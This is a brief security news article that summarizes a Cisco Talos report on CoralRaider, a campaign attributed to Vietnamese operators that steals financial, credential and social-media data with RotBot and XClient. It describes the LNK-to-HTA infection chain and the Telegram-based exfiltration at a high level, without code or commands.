Beware! CoralRaider Steals Your Financial Data

According to a recent report by Cisco Talos, since May 2023, Vietnamese hackers have been disseminating a new info-stealer aimed at acquiring financial data. The campaign, named CoralRaider, has targeted victims in India, China, South Korea, Bangladesh, Pakistan, Indonesia, and Vietnam.

The culprits’ primary objective is the theft of users’ credentials, financial information, and social media accounts, including those used for business and advertising purposes. To achieve their goals, the hackers employ RotBot (a modified variant of the Quasar RAT trojan) and the info-stealer XClient. Their arsenal also includes AsyncRAT, NetSupport RAT, and Rhadamanthys.

Particular attention is paid to business and advertising accounts. After their acquisition through Ducktail and NodeStealer, cybercriminals monetize these accounts. Data from victims’ computers are exported via Telegram and sold on the black market.

The attack chain commences with the distribution of an LNK shortcut. Currently, specialists are uncertain about the precise delivery method of these shortcuts to victims’ computers. Opening the LNK file triggers the download and execution of an HTML application (HTA) from the attackers’ server. This application initiates scripts that disable security systems and download RotBot.

RotBot is designed to establish communication with a Telegram bot, deliver the info-stealer XClient, and execute it in memory, ultimately leading to the creation of screenshots, theft of cookie files, credentials, and financial information from various browsers, as well as from Discord and Telegram.

XClient is also intended for the exfiltration of data from victims’ accounts on Facebook, Instagram, TikTok, and YouTube, gathering detailed information about payment methods and permissions associated with business and advertising accounts on Facebook.

Researchers assert that the operators of CoralRaider are based in Vietnam, corroborated by messages in their Telegram channels and a preference for the Vietnamese language in naming bots and in the malicious software code.